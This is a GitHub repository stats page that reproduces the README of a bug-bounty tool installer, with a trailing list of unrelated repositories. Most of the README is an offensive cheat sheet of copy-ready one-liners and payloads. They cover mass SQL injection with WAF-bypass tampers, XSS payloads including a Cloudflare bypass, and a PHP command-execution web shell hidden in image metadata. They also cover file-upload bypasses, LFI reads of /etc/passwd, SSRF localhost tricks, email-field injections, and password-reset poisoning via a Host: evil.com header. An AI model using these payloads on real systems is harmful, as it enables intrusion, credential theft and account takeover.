0xJin/awesome-bugbounty-builder

Awesome Bug bounty builder Project

Shell
This is stars and forks stats for /0xJin/awesome-bugbounty-builder repository. As of 02 May, 2024 this repository has 593 stars and 135 forks.

Awesome Bug Bounty Builder ¯\(ツ)/¯ Awesome Bug bounty builder Project - ALL common Tools for find your Vulnerabilities. Tested on Debian. Installation: $ git clone https://github.com/0xJin/awesome-bugbounty-builder.git $ cd awesome-bugbounty-builder/ $ chmod +x awesome-bugbounty-build.sh $ ./awesome-bugbounty-builder.sh Tools You will find here Amass Sublister Gauplus HTTPX Gf + patterns Kxss Sqlmap Commix Tplmap HYDRA John the ripper Evilwinrm Arjun Paramspider NoSQLmap NMAP Nikto FFUF 403-Bypass Gobuster Seclists Hash-identifier XSSMAP Smuggler SSRFmap Gmapsapiscanner Qsreplace exiftool XSRFProbe XXE Exploiter Rustscan LFISuite Wapiti Nuclei + template URO Freq Subzy OpenRedireX GooFuzz Fuxploider CRLFUZZ CENT Liffy SSRF-tool Infoooze Ghauri Bug Bounty TIPS and Usage of tools + One Liner TIPS : ONE-LINER RECON for FUZZ XSS : $ amass enum -brute -passive -d example.com | httpx -silent -status-code | tee domain.txt $ cat domain.txt | gauplus -random-agent -t 200 | gf xss | kxss | tee domain2.txt $ cat domain.txt | gauplus -random-agent -t 200 | gf xss | uro | qsreplace '"><img src=x onerror=prompt('jin');>' | freq FUZZ all SUBDOMAINS with FUFF ONE-LINER : $ amass enum -brute -passive -d http://example.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist.txt -u @/FUZZ -mc 200' COMMAND Injection with FUFF ONE-LINER : $ cat subdomains.txt | httpx -silent -status-code | gauplus -random-agent -t 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt $ ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 // search for ”uid” in burp proxy intercept // You can use the same query for search SSTI in qsreplase add "{{7*7}}" and search on burp for '49' SQL Injection Tips : // **MASS SQL injection** $ amass enum -brute -passive -d example.com | httpx -silent -status-code | tee domain.txt $ cat domain.txt | gauplus -random-agent -t 200 | gf sqli | tee domain2.txt $ sqlmap -m domain2.txt -dbs --batch --random-agent $ subfinder -dL domains.txt | dnsx | waybackurl | uro | grep "\?" | head -20 | httpx -silent > urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt // **SQL Injection headers** $ sqlmap -u "http://redacted.com" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10 // **SQL Injection bypass 401** $ sqlmap -u "http://redacted.com" --dbs --batch --random-agent --forms --ignore-code=401 // PRO TIPS FOR BYPASSING WAF, add to SQLmap this tamper --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned,space2comment,randomcase XSS + SQLi + CSTI/SSTI Payload: '"><svg/onload=prompt(5);>{{7*7}} EXIFTOOL + file UPLOAD Tips : $ exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg // File Upload bypass file.php%20 file.php%0a file.php%00 file.php%0d%0a file.php/ file.php.\ file. file.php.... file.pHp5.... file.png.php file.png.pHp5 file.php%00.png file.php\x00.png file.php%0a.png file.php%0d%0a.png flile.phpJunk123png file.png.jpg.php file.php%00.png%00.jpg Open Redirect Tips ONE-LINER : $ export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"' LFI ONE-LINER : $ gauplus -random-agent -t 200 http://redacted.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' $ assetfinder -subs-only target.com | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60 $ cat domains.txt | gauplus -random-agent -t 10 | gf lfi | qsreplace ".%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" | httpx -silent -nc -mr "root:x:" -t 250 Best SSRF Bypass : http://127.1/ http://0000::1:80/ http://[::]:80/ http://2130706433/ http://[email protected] http://0x7f000001/ http://017700000001 http://0177.00.00.01 Best SSRF Tips using this tool : $ amass enum -passive -brute -d yahoo.com -silent | httpx -silent | tee domains.txt | ssrf-tool -domains domains.txt -payloads payloads.txt -silent=false -paths=true -patterns patterns.txt $ echo "twitter.com" | gauplus -random-agent -t 100 | tee domains.txt; ssrftool -domains domains.txt -silent=false -paths=false -payloads payloads.txt Email Attacks : // **Header Injection** "%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com "[email protected]>\r\nRCPT TO:<victim+"@test.com // **XSS Injection** test+(<script>alert(0)</script>)@example.com test@example(<script>alert(0)</script>).com "<script>alert(0)</script>"@example.com // **SST Injection** "<%= 7 * 7 %>"@example.com test+(${{7*7}})@example.com // **SQL Injection** "' OR 1=1 -- '"@example.com "mail'); SLEEP(5);--"@example.com // **SSRF Attack** [email protected] john.doe@[127.0.0.1] XSS Payload for Image <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png My XSS for bypass CLOUDFLARE with default rules "/><svg+svg+svg\/\/On+OnLoAd=confirm(1)> Find hidden params in javascript files: $ amass enum -passive -brute -d redacted.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done IDOR to Account TakeOver quickly : ~Create an account ~In the reset field set a password and intercept with burp ~GET /user/2099/reset (change to 2098) send the request ~Take the token ~Cookie editor and use this token ~Reload page For API-KEYS : $ use gauplus and paramspider , after you can grep words like "api" or "key" and use gmapsapiscanner for see if is vulnerable. Find sensitive information with GF tool : $ gauplus redacted.com -subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee domains.txt sort -u domains.txt | fff -s 200 -o out/ $ for i in `gf -list`; do [[ ${i} =~ "_secrets"* ]] && gf ${i}; done Bypass RATE-LIMIT by adding : X-Originating-IP: IP X-Forwarded-For: IP X-Remote-IP: IP X-Remote-Addr: IP X-Client-IP: IP X-Host: IP X-Forwared-Host: IP Find Access Token with FFUF and GAUPLUS : $ cat domains.txt | sed 's/https\?:\/\///' | gau > domains2.txt $ cat domains2.txt | grep -P "\w+\.js(\?|$)" | sort -u > jsurls.txt $ ffuf -mc 200 w jsurls.txt:HFUZZ -u HFUZZ -replay-proxy http://127.0.0.1:8080 // Use Scan Check Builder Burp extension, add passive profile to extract “accessToken” or “access_token” // Extract found tokens and validate with https://github.com/streaak/keyhacks Find CORS vulnerabilities : $ amass enum -d redacted.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n3[0;32m[VUL TO CORS] 3[0m{}"' 2>/dev/null Bypass 403 and 401 : X-Original-URL: /admin X-Override-URL: /admin X-Rewrite-URL: /admin Web Cache Deception : https://hackerone.com/reports/397508 Web Cache Poisoning : https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9 Password poisoning bypass to account takeover : // Request POST https://target.com/password-reset?user=123 HTTP/1.1 Host: evil.com // If you receive a link this works! Best Wordlists : https://github.com/six2dez/OneListForAll/releases https://github.com/Karanxa/Bug-Bounty-Wordlists Thanks Don't forget to follow me on Twitter. @0xJin - This tool is made with ❤️ by 0xJin ¯\(ツ)/¯.
Read on GithubGithub Stats Page
repotechsstarsweeklyforksweekly
dustinkirkland/hollywoodShellRoffPython2.5k02330
spinnaker/spinnakerShellGoDockerfile9k01.2k0
vfarcic/devops-toolkit-crossplaneSmartyShellGo750890
signalfx/splunk-otel-collector-chartSmartyPythonShell85+11240
CodeforDAO/contractsSolidityJavaScriptShell60101000
tuist/tuistSwiftC++Ruby3.7k04210
uber/cadence-idlThriftMakefileShell80280
prevwong/craft.jsTypeScriptJavaScriptCSS6.4k06400
buqiyuan/vue3-antd-adminVueTypeScriptJavaScript2.8k07100
calcom/cal.comTypeScriptHTMLMDX23.6k04.7k0